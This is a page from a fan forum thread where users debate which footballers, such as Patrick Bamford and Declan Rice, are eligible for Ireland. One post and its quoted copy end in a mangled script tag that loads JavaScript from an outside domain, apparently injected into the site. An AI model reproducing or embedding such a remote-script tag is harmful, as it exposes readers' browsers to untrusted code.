You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Players eligible for Ireland

Post Reply Post Reply Page  <1 240241242243244 273>
Author
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:26pm
I've a Scottish born grandmother I've always felt close enough to but it would be some jump of logic to try and transplant her birth place as my national identity, I don't think that in any way reflects human reality. In any case Mcgoldrick has never as far as I can see tried to make out that he always regarded himself as Irish, that's just wishful thinking on O'Shea's part, unless it was in a secret private conversation between the two of them?< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Sponsored Links

ErsatzThistle View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote ErsatzThistle Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:29pm
Originally posted by Conan Conan wrote:

I've a Scottish born grandmother I've always felt close enough to but it would be some jump of logic to try and transplant her birth place as my national identity, I don't think that in any way reflects human reality. In any case Mcgoldrick has never as far as I can see tried to make out that he always regarded himself as Irish, that's just wishful thinking on O'Shea's part, unless it was in a secret private conversation between the two of them?< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">

Ah, go on !

What position do you play ? I'm making notes Wink
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:41pm
Originally posted by Conan Conan wrote:

It doesn't, it  reflects your human reality, so, as a result, you view everyone else through that prism. National identity(identities) are incredibly personal, your view of what Ireland is and what it should be will be different to mine. One lad with a Scottish grandmother will feel no connection to that country, another lad will be wandering about in a kilt with his balls hanging out. 

Greed has won, big finance has won. Whatever small role elite clubs still play in the local communities from which they grew is dwarfed now by their position as global brands.
TheMightyQuinn View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote TheMightyQuinn Quote  Post ReplyReply Direct Link To This Post Posted: 28 Mar 2019 at 2:12am

Lol - love the imagery here.

McClean’s heart is in the right place, but his head is not. Love the guys passion, but dual nationality is complex, and dependent on many things that would be very difficult to quantify. (I say that as a dual national)....

In my humble and likely unqualified opinion I can appreciate that there is a point where a player needs to make a decision, and a point where the organization (FAI) needs to stop pandering to a player with ability.... and both groups are free to walk that line to their own benefit until that point...

For me- that point is the Sr shirt call up. 

There no point in trying to assess anyone’s legitimacy to the Irish shirt until they turn down a call up.

If a player turns up for the 21’s (or any underage) for years, then suddenly wants to “concentrate on their club career” once called up  to the Sr. team,  then I’m immediately suspicious. For me, assume that guy is gone... good luck to them. 

If a player that is later in their career (say post age 21) and identify that  they qualify, and then take the necessary steps to declare, turn up with bells and whistles,  then welcome aboard. 

Rice and Grealish were keeping their options Open all along. “Concentrating on their club”... that was the line... 

Finally, there is some responsibility to the teams to create a sense of inclusion/comradery so that when players that are “on the fence” are involved- they want to stay involved. . 

You'll not see nothing like the Mighty Quinn
Luis Amor Rodriguez View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Luis Amor Rodriguez Quote  Post ReplyReply Direct Link To This Post Posted: 02 Apr 2019 at 9:59pm
Max O'Leary getting time in nets for play-off placed Bristol City.  
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 02 Apr 2019 at 10:04pm
Originally posted by Luis Amor Rodriguez Luis Amor Rodriguez wrote:

Max O'Leary getting time in nets for play-off placed Bristol City.  
I always feel he looks better in lace.
Greed has won, big finance has won. Whatever small role elite clubs still play in the local communities from which they grew is dwarfed now by their position as global brands.
amccarten313 View Drop Down
500 Club la la la
500 Club la la la

Post Options Post Options   Thanks (0) Thanks(0)   Quote amccarten313 Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:39pm
bamford has 2 tonight for leeds
grannyrule View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote grannyrule Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:44pm
Originally posted by amccarten313 amccarten313 wrote:

bamford has 2 tonight for leeds

Excellent first strike and a very good header for the second.
"It has been one of the worst years in living memory of Irish football, it has been that bad and a lot of it is down to Martin. The morale is rock bottom." - Keith Andrews, 16/10/2018
Gary McKay View Drop Down
Roy Keane
Roy Keane

Yo Adrian

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gary McKay Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:44pm
Young Irish lad, born and bred in Lucan, Jamie Egan off Cabinteely in the Wales u17 squad. I coached him, his father played for me.

WTF ?
"Smalling and Jones.... have the potential to be the PL’s best ever pairing in my opinion." - SlurAlex
ProudAndLoud View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote ProudAndLoud Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:46pm
Good Aul Man Seany Egan :) and another  AULD Orchard lad Davy Collins son Nathan made debut at 18 for Stoke tonight
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
Spouter of Utter Nonsense

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 10:27pm
Kyle Taylor of Bournemouth is eligible according to a foot.ie poster. He seems fairly highly rated.
We're decent enough..
BigStrongMan View Drop Down
Robbie Keane
Robbie Keane

Just Modding Like

Post Options Post Options   Thanks (0) Thanks(0)   Quote BigStrongMan Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 10:28pm
Originally posted by Gary McKay Gary McKay wrote:

Young Irish lad, born and bred in Lucan, Jamie Egan off Cabinteely in the Wales u17 squad. I coached him, his father played for me.

WTF ?
saw that. Think it’s a development squad but a strange one
PM me for all forum moderation queries.
The Huntacha View Drop Down
Jack Charlton
Jack Charlton

Post Options Post Options   Thanks (0) Thanks(0)   Quote The Huntacha Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 11:26am
Originally posted by Gary McKay Gary McKay wrote:

WTF ?

Did you ride his aul one and this is his payback?
Jimmy Bullard - "Favorite band? Elastic."
Healy52003 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Healy52003 Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 6:11pm
so Harry Kane is hurt again and Paddy Bamford will now believe he has a decent chance of getting on Southgates rader 

Bamford is as good as gone i reckon
doherty View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote doherty Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 6:31pm
Originally posted by Healy52003 Healy52003 wrote:

so Harry Kane is hurt again and Paddy Bamford will now believe he has a decent chance of getting on Southgates rader 

Bamford is as good as gone i reckon

One can only hope
Jimbhoy View Drop Down
Phil Babb
Phil Babb

Post Options Post Options   Thanks (0) Thanks(0)   Quote Jimbhoy Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 6:50pm
There must be at least 10-12 strikers ahead of Bamford in the queue for an England shirt. Off the top of my head the following players would be ahead of him - Rashford, Kane, Sancho, Wilson, Sturridge, Solanke, Abrahams, Calvert-Lewin, Walcott, Welbeck.

I would rather promote Idah, Connolly, Cassidy or Parrott from our underage teams than have Bamford or Will Keane in an Ireland shirt.
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
Spouter of Utter Nonsense

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 6:52pm
If Bamford comes on board this Summer, then I think he's done so (just about) in reasonable time. If he stalls again, forget him.
We're decent enough..
JoxerDaly View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote JoxerDaly Quote  Post ReplyReply Direct Link To This Post Posted: 10 Apr 2019 at 6:54pm
No interest in Bamford. 
 Post Reply Post Reply Page  <1 240241242243244 273>
  Share Topic